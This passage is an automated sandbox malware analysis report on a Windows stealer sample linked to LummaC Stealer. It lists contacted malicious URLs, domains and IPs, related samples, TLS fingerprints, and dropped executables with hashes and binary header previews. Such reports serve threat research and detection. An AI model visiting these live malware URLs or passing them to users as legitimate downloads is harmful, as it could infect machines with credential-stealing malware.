                                                                            https://github.com/go-sql-driver/mysql/wiki/old_passwordshttp2:MdhO83N5Fm.exe, 00000000.00000000.2059093154.0000000001A7A000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                              		high
                                                                              https://%s.amazonaws.com/%sifSourceMetagenerationMatchif_metageneration_not_matchignoringMdhO83N5Fm.exe, 00000000.00000000.2059093154.0000000001A7A000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://cegu.shop/8574262446/ph.txtkBitLockerToGo.exe, 00000003.00000002.2756645110.0000000000548000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2754604014.0000000000548000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2617397986.0000000000545000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2579050757.0000000000545000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: malware
                                                                              		unknown
                                                                              https://simplerapplau.click/GBitLockerToGo.exe, 00000003.00000003.2617535427.00000000004C7000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2753117538.00000000004C7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: malware
                                                                              		unknown
                                                                              https://simplerapplau.click:443/apicrosoftBitLockerToGo.exe, 00000003.00000002.2756419053.00000000004B0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: malware
                                                                              		unknown

                                                                              World Map of Contacted IPs

                                                                              • No. of IPs < 25%
                                                                              • 25% < No. of IPs < 50%
                                                                              • 50% < No. of IPs < 75%
                                                                              • 75% < No. of IPs

                                                                              Public IPs

                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                              172.67.152.160
                                                                              		simplerapplau.clickUnited States
                                                                              		13335CLOUDFLARENETUStrue
                                                                              185.161.251.21
                                                                              		cegu.shopUnited Kingdom
                                                                              		5089NTLGBfalse
                                                                              172.67.208.58
                                                                              		klipvumisui.shopUnited States
                                                                              		13335CLOUDFLARENETUSfalse

                                                                              General Information

                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                              Analysis ID:1581892
                                                                              Start date and time:2024-12-29 08:54:25 +01:00
                                                                              Joe Sandbox product:CloudBasic
                                                                              Overall analysis duration:0h 9m 49s
                                                                              Hypervisor based Inspection enabled:false
                                                                              Report type:full
                                                                              Cookbook file name:default.jbs
                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                              Number of analysed new started processes analysed:38
                                                                              Number of new started drivers analysed:0
                                                                              Number of existing processes analysed:0
                                                                              Number of existing drivers analysed:0
                                                                              Number of injected processes analysed:0
                                                                              Technologies:
                                                                              • HCA enabled
                                                                              • EGA enabled
                                                                              • AMSI enabled
                                                                              Analysis Mode:default
                                                                              Analysis stop reason:Timeout
                                                                              Sample name:MdhO83N5Fm.exe
                                                                              renamed because original name is a hash value
                                                                              Original Sample Name:9fed7135d164c0fb31b859fcd5acfe5f.exe
                                                                              Detection:MAL
                                                                              Classification:mal100.troj.spyw.evad.winEXE@61/13@4/3
                                                                              EGA Information:Failed
                                                                              HCA Information:Failed
                                                                              Cookbook Comments:
                                                                              • Found application associated with file extension: .exe

                                                                              Warnings

                                                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                              • Excluded IPs from analysis (whitelisted): 13.107.246.63, 20.109.210.53
                                                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                              • Execution Graph export aborted for target BitLockerToGo.exe, PID 5284 because there are no executed function
                                                                              • Execution Graph export aborted for target BrightLib.exe, PID 6828 because there are no executed function
                                                                              • Execution Graph export aborted for target MdhO83N5Fm.exe, PID 4088 because there are no executed function
                                                                              • Execution Graph export aborted for target powershell.exe, PID 2780 because it is empty
                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                              Simulations

                                                                              Behavior and APIs

                                                                              TimeTypeDescription
                                                                              02:55:45API Interceptor9x Sleep call for process: BitLockerToGo.exe modified
                                                                              02:56:10API Interceptor7x Sleep call for process: powershell.exe modified
                                                                              02:57:14API Interceptor1x Sleep call for process: BrightLib.exe modified

                                                                              Joe Sandbox View / Context

                                                                              IPs

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              185.161.251.21installer_1.05_36.4.exeGet hashmaliciousLummaC StealerBrowse
                                                                                !Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                  @Setup.exeGet hashmaliciousLummaCBrowse
                                                                                    Full_Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                      appFile.exeGet hashmaliciousLummaC StealerBrowse
                                                                                        installer_1.05_36.4.zipGet hashmaliciousNetSupport RAT, LummaC, LummaC StealerBrowse
                                                                                          172.67.208.58@Setup.exeGet hashmaliciousLummaCBrowse
                                                                                            does virginia have a no chase law for motorcycles 62848.jsGet hashmaliciousUnknownBrowse

                                                                                              Domains

                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              cegu.shopinstaller_1.05_36.4.exeGet hashmaliciousLummaC StealerBrowse
                                                                                              • 185.161.251.21
                                                                                              !Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                              • 185.161.251.21
                                                                                              @Setup.exeGet hashmaliciousLummaCBrowse
                                                                                              • 185.161.251.21
                                                                                              Full_Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                              • 185.161.251.21
                                                                                              appFile.exeGet hashmaliciousLummaC StealerBrowse
                                                                                              • 185.161.251.21
                                                                                              installer_1.05_36.4.zipGet hashmaliciousNetSupport RAT, LummaC, LummaC StealerBrowse
                                                                                              • 185.161.251.21
                                                                                              simplerapplau.clickSetup.exeGet hashmaliciousLummaCBrowse
                                                                                              • 104.21.88.199
                                                                                              klipvumisui.shopinstaller_1.05_36.4.exeGet hashmaliciousLummaC StealerBrowse
                                                                                              • 104.21.37.128
                                                                                              !Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                              • 104.21.37.128
                                                                                              @Setup.exeGet hashmaliciousLummaCBrowse
                                                                                              • 172.67.208.58
                                                                                              Full_Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                              • 104.21.37.128

                                                                                              ASNs

                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              CLOUDFLARENETUSrfWu0dUz6A.exeGet hashmaliciousLummaCBrowse
                                                                                              • 104.21.32.1
                                                                                              Tool_Unlock_v1.2.exeGet hashmaliciousVidarBrowse
                                                                                              • 172.64.41.3
                                                                                              Gabriel-4.9.exeGet hashmaliciousNitol, ZegostBrowse
                                                                                              • 172.67.165.100
                                                                                              https://gtgyhtrgerftrgr.blob.core.windows.net/frhvhgse/vsgwhk.htmlGet hashmaliciousUnknownBrowse
                                                                                              • 104.21.77.48
                                                                                              EjS7Q5fFCE.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                              • 172.67.186.200
                                                                                              VegaStealer_v2.exeGet hashmaliciousAdes Stealer, BlackGuard, NitroStealer, VEGA StealerBrowse
                                                                                              • 172.67.160.84
                                                                                              SharcHack.exeGet hashmaliciousAdes Stealer, BlackGuard, NitroStealer, VEGA Stealer, XmrigBrowse
                                                                                              • 172.67.160.84
                                                                                              aimware.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                              • 172.67.132.55
                                                                                              https://belasting.online-factuur.comGet hashmaliciousUnknownBrowse
                                                                                              • 172.67.171.151
                                                                                              https://kn0wbe4.compromisedblog.com/XZHJISTcycW1tZkROWG92Y2ZEc21laS80dzNTR2N0eEsvTDFRWGFNODdGaGtjNGo5VzRyMFRUQmFLM0grcGxUbnBSTVFhMEg2Smd3UkovaXVjaUpIcG1hZG5CQnh5aFlZTXNqNldTdm84cE5CMUtld0dCZzN4ZUFRK2lvL1FWTG92NUJsMnJ3OHFGckdTNFhnMkFUTFZFZTdKRnVJaTRuRGFKdXVyeUdCVytuQzdnMEV1ZExSMnlwWi9RPT0tLTdnZjhxQVZPbUdTdFZXVUEtLXA0bHNCNGxmeTdrdmlkWWRVcmRXRWc9PQ==?cid=2310423310Get hashmaliciousKnowBe4Browse
                                                                                              • 1.1.1.1
                                                                                              NTLGBinstaller_1.05_36.4.exeGet hashmaliciousLummaC StealerBrowse
                                                                                              • 185.161.251.21
                                                                                              !Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                              • 185.161.251.21
                                                                                              @Setup.exeGet hashmaliciousLummaCBrowse
                                                                                              • 185.161.251.21
                                                                                              Full_Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                              • 185.161.251.21
                                                                                              appFile.exeGet hashmaliciousLummaC StealerBrowse
                                                                                              • 185.161.251.21
                                                                                              db0fa4b8db0333367e9bda3ab68b8042.x86.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                              • 81.97.105.115
                                                                                              installer_1.05_36.4.zipGet hashmaliciousNetSupport RAT, LummaC, LummaC StealerBrowse
                                                                                              • 185.161.251.21
                                                                                              xd.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                              • 163.165.65.186
                                                                                              xd.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                              • 92.237.44.174
                                                                                              telnet.ppc.elfGet hashmaliciousUnknownBrowse
                                                                                              • 80.4.135.78
                                                                                              CLOUDFLARENETUSrfWu0dUz6A.exeGet hashmaliciousLummaCBrowse
                                                                                              • 104.21.32.1
                                                                                              Tool_Unlock_v1.2.exeGet hashmaliciousVidarBrowse
                                                                                              • 172.64.41.3
                                                                                              Gabriel-4.9.exeGet hashmaliciousNitol, ZegostBrowse
                                                                                              • 172.67.165.100
                                                                                              https://gtgyhtrgerftrgr.blob.core.windows.net/frhvhgse/vsgwhk.htmlGet hashmaliciousUnknownBrowse
                                                                                              • 104.21.77.48
                                                                                              EjS7Q5fFCE.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                              • 172.67.186.200
                                                                                              VegaStealer_v2.exeGet hashmaliciousAdes Stealer, BlackGuard, NitroStealer, VEGA StealerBrowse
                                                                                              • 172.67.160.84
                                                                                              SharcHack.exeGet hashmaliciousAdes Stealer, BlackGuard, NitroStealer, VEGA Stealer, XmrigBrowse
                                                                                              • 172.67.160.84
                                                                                              aimware.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                              • 172.67.132.55
                                                                                              https://belasting.online-factuur.comGet hashmaliciousUnknownBrowse
                                                                                              • 172.67.171.151
                                                                                              https://kn0wbe4.compromisedblog.com/XZHJISTcycW1tZkROWG92Y2ZEc21laS80dzNTR2N0eEsvTDFRWGFNODdGaGtjNGo5VzRyMFRUQmFLM0grcGxUbnBSTVFhMEg2Smd3UkovaXVjaUpIcG1hZG5CQnh5aFlZTXNqNldTdm84cE5CMUtld0dCZzN4ZUFRK2lvL1FWTG92NUJsMnJ3OHFGckdTNFhnMkFUTFZFZTdKRnVJaTRuRGFKdXVyeUdCVytuQzdnMEV1ZExSMnlwWi9RPT0tLTdnZjhxQVZPbUdTdFZXVUEtLXA0bHNCNGxmeTdrdmlkWWRVcmRXRWc9PQ==?cid=2310423310Get hashmaliciousKnowBe4Browse
                                                                                              • 1.1.1.1

                                                                                              JA3 Fingerprints

                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              a0e9f5d64349fb13191bc781f81f42e1rfWu0dUz6A.exeGet hashmaliciousLummaCBrowse
                                                                                              • 172.67.208.58
                                                                                              • 172.67.152.160
                                                                                              • 185.161.251.21
                                                                                              SharcHack.exeGet hashmaliciousAdes Stealer, BlackGuard, NitroStealer, VEGA Stealer, XmrigBrowse
                                                                                              • 172.67.208.58
                                                                                              • 172.67.152.160
                                                                                              • 185.161.251.21
                                                                                              gdi32.dllGet hashmaliciousLummaCBrowse
                                                                                              • 172.67.208.58
                                                                                              • 172.67.152.160
                                                                                              • 185.161.251.21
                                                                                              Loader.exeGet hashmaliciousLummaCBrowse
                                                                                              • 172.67.208.58
                                                                                              • 172.67.152.160
                                                                                              • 185.161.251.21
                                                                                              Crosshair-X.exeGet hashmaliciousLummaCBrowse
                                                                                              • 172.67.208.58
                                                                                              • 172.67.152.160
                                                                                              • 185.161.251.21
                                                                                              !Set-up..exeGet hashmaliciousLummaC StealerBrowse
                                                                                              • 172.67.208.58
                                                                                              • 172.67.152.160
                                                                                              • 185.161.251.21
                                                                                              !Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                              • 172.67.208.58
                                                                                              • 172.67.152.160
                                                                                              • 185.161.251.21
                                                                                              Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                              • 172.67.208.58
                                                                                              • 172.67.152.160
                                                                                              • 185.161.251.21
                                                                                              iien1HBbB3.exeGet hashmaliciousLummaCBrowse
                                                                                              • 172.67.208.58
                                                                                              • 172.67.152.160
                                                                                              • 185.161.251.21
                                                                                              SgMuuLxOCJ.exeGet hashmaliciousLummaCBrowse
                                                                                              • 172.67.208.58
                                                                                              • 172.67.152.160
                                                                                              • 185.161.251.21

                                                                                              Dropped Files

                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              C:\Users\user\AppData\Local\Temp\is-0FNEB.tmp\_isetup\_isdecmp.dllinstaller_1.05_36.4.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                !Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                  @Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                    Full_Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                      appFile.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                        FloydMounts.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                          cho_mea64.exeGet hashmaliciousMicroClipBrowse
                                                                                                            cho_mea64.exeGet hashmaliciousMicroClipBrowse
                                                                                                              https://bakkesmod.com/download.phpGet hashmaliciousUnknownBrowse
                                                                                                                Girls-Questionnaire-For-Autism-Spectrum-Disorders.exeGet hashmaliciousUnknownBrowse

                                                                                                                  Created / dropped Files

                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):64
                                                                                                                  Entropy (8bit):1.1510207563435464
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Nlllul9kLZ:NllUG
                                                                                                                  MD5:087D847469EB88D02E57100D76A2E8E4
                                                                                                                  SHA1:A2B15CEC90C75870FDAE3FEFD9878DD172319474
                                                                                                                  SHA-256:81EB9A97215EB41752F6F4189343E81A0D5D7332E1646A24750D2E08B4CAE013
                                                                                                                  SHA-512:4682F4457C1136F84C10ACFE3BD114ACF3CCDECC1BDECC340A5A36624D93A4CB3D262B3A6DD3523C31E57C969F04903AB86BE3A2C6B07193BF08C00962B33727
                                                                                                                  Malicious:false
                                                                                                                  Preview:@...e.................................,..............@..........

                                                                                                                  C:\Users\user\AppData\Local\Temp\MBL4EF1WJ27Y40L4B4G3AI.exe

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):8767044
                                                                                                                  Entropy (8bit):7.960152326344281
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:196608:r7B6e1u5SqD6mOefSP01pbtDgGFN6sskirwDODi:roweOFCS8jbtM8N6sjYY
                                                                                                                  MD5:51F99EDDD33CC04FB0F55F873B76D907
                                                                                                                  SHA1:60CD79359912A9069674CEE3C5C5982A9B01CE82
                                                                                                                  SHA-256:16E037D7B5F6A8E02B73671E1214B7979EB5D0AB0FC1106CF4C321F0FF53E13A
                                                                                                                  SHA-512:7D2DF781963C8AC8A6F2A86EB95742AA26C932671D31DF8F09E334B2AF5E543EC3FB636ABFA4FB2512EC70126E1B9DB6DC7E9446A2A85BCA53EAFC790668964A
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 14%
                                                                                                                  Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f.................t...p....................@.......................................@......@...................p..q....P.......................~..XG...........................................................R..\....`.......................text....V.......X.................. ..`.itext..d....p.......\.............. ..`.data...88.......:...x..............@....bss....Xr...............................idata.......P......................@....didata......`......................@....edata..q....p......................@..@.tls.....................................rdata..]...........................@..@.reloc..............................@..B.rsrc...............................@..@....................................@..@................

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iak5ujkr.peg.psm1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mrwkn5px.ks5.ps1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\fe64937f

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe
                                                                                                                  File Type:PNG image data, 3792 x 2093, 8-bit/color RGB, non-interlaced
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):6447207
                                                                                                                  Entropy (8bit):7.998441497232368
                                                                                                                  Encrypted:true
                                                                                                                  SSDEEP:196608:sXKjzP/kSY5cPYsvASGkG9166F/KHaj2M:sXKjrMSY5yPoxv/XL
                                                                                                                  MD5:B0CB3F07919BEB69B342ED871C6511A9
                                                                                                                  SHA1:C23C0B4F9810D50ECB9EA186F57325C7B41DEEBE
                                                                                                                  SHA-256:AB4A4A40AA1C1129150AE38AA4F939EB22B4125F6BE8F12251D7C76239B3F8F3
                                                                                                                  SHA-512:75BD57701CAC2BE23A9A63AE414F0E019D7C69523F93B3CE6D908B76CC382D84AB1F1C2B085633D39A8E7294C1879601A1A3B03C5871BA0E35A345F559E06AA4
                                                                                                                  Malicious:false
                                                                                                                  Preview:.PNG........IHDR.......-.....1S.... .IDATx..;..G....+.U={.. .....H.$..gm........1c...&.r....wm..=...-F...W....ft...Y.........~.3+.....|....?@@...o......\.._@...c....0.e..o..us).-.9~.4..:.H]..R.#M.K.!...#.s...4..G.c.#Zk.#B.s...p......R...PU....HUU..RJ.......^...Ru]..n...&w.R.WeE.DH.kB...)....!.....cRI.....d.u.....W..j..xw... .e,.....lC`....o=.^ `..d....;.nH..|k..3..}......'Ts.....D....C..h.{......$.}w.np..h.n1..U9\F..<[...J..\..............c..f.6.g.o......$.1..^z)..8..c$./.|3...s.9..&.|...r....L.q..I~{)..>.uw..oY.d../..ksw..P..p.]....T.K1.R..i.........I.9B.....D@@@..a/.?.[ 8.K|......H..X..T...4.{..c..4..!.^...}X~7.'......uc.$H................|.{5...Q...,..{..p..]v{....m.]).....[-.{..... !l......V..W k....u....g...$....[%>^.oI.|.......$.......$.g.@...m.hI~S;.).=...K%..H.T..d"....W.O.J.A..../%..@..J..-...ZW........oz....b.....B..x.1......>q.....[..I>..l...t..I..I..n....s....P..p...C..3..|.(..<..3r.F7d.#..;..".p..dg.p.#4Mm........}.....A.......

                                                                                                                  C:\Users\user\AppData\Local\Temp\is-0FNEB.tmp\_isetup\_isdecmp.dll

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-FKJO0.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmp
                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):35616
                                                                                                                  Entropy (8bit):6.953519176025623
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:768:Z4NHPfHCs6GNOpiM+RFjFyzcN23A4F+OiR9riuujF+X4UriXiRF:Zanvc+R9F4s8/RiPWuUs4UWXiv
                                                                                                                  MD5:C6AE924AD02500284F7E4EFA11FA7CFC
                                                                                                                  SHA1:2A7770B473B0A7DC9A331D017297FF5AF400FED8
                                                                                                                  SHA-256:31D04C1E4BFDFA34704C142FA98F80C0A3076E4B312D6ADA57C4BE9D9C7DCF26
                                                                                                                  SHA-512:F321E4820B39D1642FC43BF1055471A323EDCC0C4CBD3DDD5AD26A7B28C4FB9FC4E57C00AE7819A4F45A3E0BB9C7BAA0BA19C3CEEDACF38B911CDF625AA7DDAE
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                  Joe Sandbox View:
                                                                                                                  • Filename: installer_1.05_36.4.exe, Detection: malicious, Browse
                                                                                                                  • Filename: !Setup.exe, Detection: malicious, Browse
                                                                                                                  • Filename: @Setup.exe, Detection: malicious, Browse
                                                                                                                  • Filename: Full_Setup.exe, Detection: malicious, Browse
                                                                                                                  • Filename: appFile.exe, Detection: malicious, Browse
                                                                                                                  • Filename: FloydMounts.exe, Detection: malicious, Browse
                                                                                                                  • Filename: cho_mea64.exe, Detection: malicious, Browse
                                                                                                                  • Filename: cho_mea64.exe, Detection: malicious, Browse
                                                                                                                  • Filename: , Detection: malicious, Browse
                                                                                                                  • Filename: Girls-Questionnaire-For-Autism-Spectrum-Disorders.exe, Detection: malicious, Browse
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g...#~..#~..#~...q.. ~..#~..!~......"~......+~......"~......"~..Rich#~..........................PE..L....[.L...........!.....6...........E.......P......................................D=...............................P.......P..(....................L.. ?...p.......................................................P...............................text....5.......6.................. ..`.rdata.......P.......:..............@..@.data...8....`.......<..............@....reloc.......p.......J..............@..B................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                  C:\Users\user\AppData\Local\Temp\is-0FNEB.tmp\_isetup\_setup64.tmp

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-FKJO0.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmp
                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):6144
                                                                                                                  Entropy (8bit):4.720366600008286
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                                                                                                  MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                                                                                                  SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                                                                                                  SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                                                                                                  SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                                                                                                  Malicious:false
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................

                                                                                                                  C:\Users\user\AppData\Local\Temp\is-B6SUS.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmp

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\MBL4EF1WJ27Y40L4B4G3AI.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):3367424
                                                                                                                  Entropy (8bit):6.530011244733973
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:98304:qJYVM+LtVt3P/KuG2ONG9iqLRQEd333T:7VL/tnHGYiql5l
                                                                                                                  MD5:F809F51E678B7F2E388F8C969EF902C8
                                                                                                                  SHA1:DC1C645533E0FD1637BF455BA69A9481E7C4B83A
                                                                                                                  SHA-256:8D6E5513DE230109BE2238537173352832D1AEBDC7B10FAD0E59D4882812CA81
                                                                                                                  SHA-512:C500B40B604AD6203396FCC0243CBB50EAD544586EAB2448C2C6BCC2106DFAE3777A85C344766224F5F695FA60295880623B2A97B0AAE97DC547076FA03CD067
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                  Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04.......3...@......@...................P,.n.....,.j:...P0.p.....................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc...p....P0......./.............@..@.............04......`3.............@..@................

                                                                                                                  C:\Users\user\AppData\Local\Temp\is-FKJO0.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmp

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\MBL4EF1WJ27Y40L4B4G3AI.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):3367424
                                                                                                                  Entropy (8bit):6.530011244733973
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:98304:qJYVM+LtVt3P/KuG2ONG9iqLRQEd333T:7VL/tnHGYiql5l
                                                                                                                  MD5:F809F51E678B7F2E388F8C969EF902C8
                                                                                                                  SHA1:DC1C645533E0FD1637BF455BA69A9481E7C4B83A
                                                                                                                  SHA-256:8D6E5513DE230109BE2238537173352832D1AEBDC7B10FAD0E59D4882812CA81
                                                                                                                  SHA-512:C500B40B604AD6203396FCC0243CBB50EAD544586EAB2448C2C6BCC2106DFAE3777A85C344766224F5F695FA60295880623B2A97B0AAE97DC547076FA03CD067
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                  Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04.......3...@......@...................P,.n.....,.j:...P0.p.....................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc...p....P0......./.............@..@.............04......`3.............@..@................

                                                                                                                  C:\Users\user\AppData\Local\Temp\is-V3A6I.tmp\_isetup\_isdecmp.dll

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-B6SUS.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmp
